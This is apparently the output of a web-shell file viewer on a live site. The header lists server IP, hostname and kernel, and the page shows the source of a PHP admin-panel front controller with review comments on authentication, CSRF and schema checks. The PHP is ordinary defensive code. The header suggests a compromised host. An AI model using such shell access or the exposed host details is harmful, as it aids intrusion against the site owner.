Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Viewing: index.php
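<?php
/**
 * Admin Panel Front Controller
 *
 * Single entry point for all admin panel requests. Authenticates the admin,
 * opens the database connection, runs the POST form handler, resolves the
 * requested section and renders it inside the shared layout.
 *
 * URL pattern:     /admin/index.php?section={section_name}
 * Valid sections:  dashboard, clients, orders, contents, products, emails, web, users
 * Default section: dashboard (also used when the requested name is not allowlisted)
 *
 * Every variable assigned here lives in the global scope, so the section
 * files and layout.php included below can read and overwrite all of them.
 */

// ----------------------------------------------------------------------------
// 1. Bootstrap and authentication gate
// ----------------------------------------------------------------------------
require_once __DIR__ . '/../app/bootstrap.php';
require_once __DIR__ . '/../app/schema.php';
require_once __DIR__ . '/../app/portal_helpers.php';

// Redirects to the login page when no admin is authenticated.
// NOTE(review): everything below relies on require_admin() also stopping
// execution (exit after the redirect) for unauthenticated requests - confirm
// in its implementation, which is not part of this file.
require_admin();

// ----------------------------------------------------------------------------
// 2. Database connection
// ----------------------------------------------------------------------------
try {
    $pdo = db(true);
} catch (Throwable $exception) {
    // Keep the cause in the server log; the client only gets the generic text.
    error_log('[admin] database connection failed: ' . $exception->getMessage());
    if (!headers_sent()) {
        // Report the failure as a server error instead of a 200 page.
        http_response_code(500);
    }
    exit('No se pudo conectar con MySQL. Revisa config/database.php e importa database/schema.sql.');
}

// Refresh the profile fields cached in the session from cms_users, so sessions
// created before these fields existed pick them up.
$currentUser = admin_user();
if ($currentUser) {
    try {
        // Parameterized lookup: the session-held id never reaches the SQL text.
        $stmt = $pdo->prepare('SELECT username, name, signature_url, photo_url, is_active FROM cms_users WHERE id = ? LIMIT 1');
        $stmt->execute([$currentUser['id']]);
        $profile = $stmt->fetch();
        if ($profile) {
            // username/name keep the session value when the column is NULL.
            $_SESSION['admin_user']['username'] = $profile['username'] ?? ($_SESSION['admin_user']['username'] ?? '');
            $_SESSION['admin_user']['name'] = $profile['name'] ?? ($_SESSION['admin_user']['name'] ?? '');
            $_SESSION['admin_user']['signature_url'] = $profile['signature_url'] ?? '';
            $_SESSION['admin_user']['photo_url'] = $profile['photo_url'] ?? '';
            // NOTE(review): a NULL is_active falls back to 1 (active), and the
            // flag is only copied into the session here, not enforced. A missing
            // row ($profile falsy) also leaves the session as it was. Confirm that
            // require_admin() or the login path rejects deactivated or deleted
            // accounts; otherwise such a session stays usable until it expires.
            $_SESSION['admin_user']['is_active'] = $profile['is_active'] ?? 1;
        }
    } catch (Throwable $exception) {
        // Best effort: the request continues, but the failure is no longer silent.
        error_log('[admin] profile refresh failed: ' . $exception->getMessage());
        // Guarantee the keys read later exist even though the refresh failed.
        $_SESSION['admin_user']['signature_url'] = $_SESSION['admin_user']['signature_url'] ?? '';
        $_SESSION['admin_user']['photo_url'] = $_SESSION['admin_user']['photo_url'] ?? '';
    }
}

// ----------------------------------------------------------------------------
// 3. Helper files
// ----------------------------------------------------------------------------
require_once __DIR__ . '/helpers/common.php';
require_once __DIR__ . '/helpers/client_helpers.php';
require_once __DIR__ . '/helpers/order_helpers.php';
require_once __DIR__ . '/helpers/content_helpers.php';
require_once __DIR__ . '/helpers/product_helpers.php';
require_once __DIR__ . '/helpers/asset_helpers.php';
require_once __DIR__ . '/helpers/database_helpers.php';
require_once __DIR__ . '/helpers/email_helpers.php';

// ----------------------------------------------------------------------------
// 4. Schema checks (run on every admin request)
// ----------------------------------------------------------------------------
// NOTE(review): presumably these issue DDL when tables or columns are missing,
// which would require the web application's database account to hold
// CREATE/ALTER privileges - confirm, and consider a deploy-time migration so
// the runtime account can be restricted to data access only.
ensure_orders_schema($pdo);
ensure_client_portal_schema($pdo);
ensure_email_schema($pdo);

// ----------------------------------------------------------------------------
// 5. POST processing
// ----------------------------------------------------------------------------
// NOTE(review): no CSRF token check is visible in this file - confirm that
// handlers/form_handler.php validates one before acting on a POST.
require_once __DIR__ . '/handlers/form_handler.php';

// ----------------------------------------------------------------------------
// 6-8. Resolve the requested section against an allowlist
// ----------------------------------------------------------------------------
$validSections = ['dashboard', 'clients', 'orders', 'contents', 'products', 'emails', 'web', 'users'];

$currentSection = $_GET['section'] ?? 'dashboard';

// Strict comparison: anything that is not exactly one of the listed strings
// (including array input such as section[]=x) falls back to the dashboard.
if (!in_array($currentSection, $validSections, true)) {
    $currentSection = 'dashboard';
}

// ----------------------------------------------------------------------------
// 9. Section name => file path
// ----------------------------------------------------------------------------
// The include path is looked up in this fixed map and never built from the
// request value, so the query string cannot steer the require below to
// another file.
$sectionFiles = [
    'dashboard' => __DIR__ . '/sections/dashboard.php',
    'clients' => __DIR__ . '/sections/clients.php',
    'orders' => __DIR__ . '/sections/orders.php',
    'contents' => __DIR__ . '/sections/contents.php',
    'products' => __DIR__ . '/sections/products.php',
    'emails' => __DIR__ . '/sections/emails.php',
    'web' => __DIR__ . '/sections/web.php',
    'users' => __DIR__ . '/sections/users.php',
];
$sectionFile = $sectionFiles[$currentSection];

// ----------------------------------------------------------------------------
// 10. Load the section and capture its content
// ----------------------------------------------------------------------------
$sectionContent = '';
if (file_exists($sectionFile)) {
    // Section files are expected to return their rendered markup (per the
    // original note, captured through output buffering). A file without a
    // return statement would make require evaluate to int 1 here.
    $sectionContent = require $sectionFile;
} else {
    // Allowlisted section whose file is missing on disk.
    $sectionContent = '<div class="alert alert-warning">Sección no encontrada.</div>';
}

// ----------------------------------------------------------------------------
// 11. Page titles
// ----------------------------------------------------------------------------
$pageTitles = [
    'dashboard' => 'Dashboard',
    'clients' => 'Clientes',
    'orders' => 'Pedidos',
    'contents' => 'Contenidos',
    'products' => 'Productos',
    'emails' => 'Correos',
    'web' => 'Web',
    'users' => 'Usuarios',
];
$pageTitle = $pageTitles[$currentSection] ?? 'Admin';

// ----------------------------------------------------------------------------
// 12. Flash message from the session
// ----------------------------------------------------------------------------
$flash = flash();

// ----------------------------------------------------------------------------
// 13. Globals expected by the layout
// ----------------------------------------------------------------------------
// A section may already have defined $contactsByClient; default it otherwise.
if (!isset($contactsByClient)) {
    $contactsByClient = [];
}

// ----------------------------------------------------------------------------
// 14. Render the layout
// ----------------------------------------------------------------------------
require __DIR__ . '/layout.php';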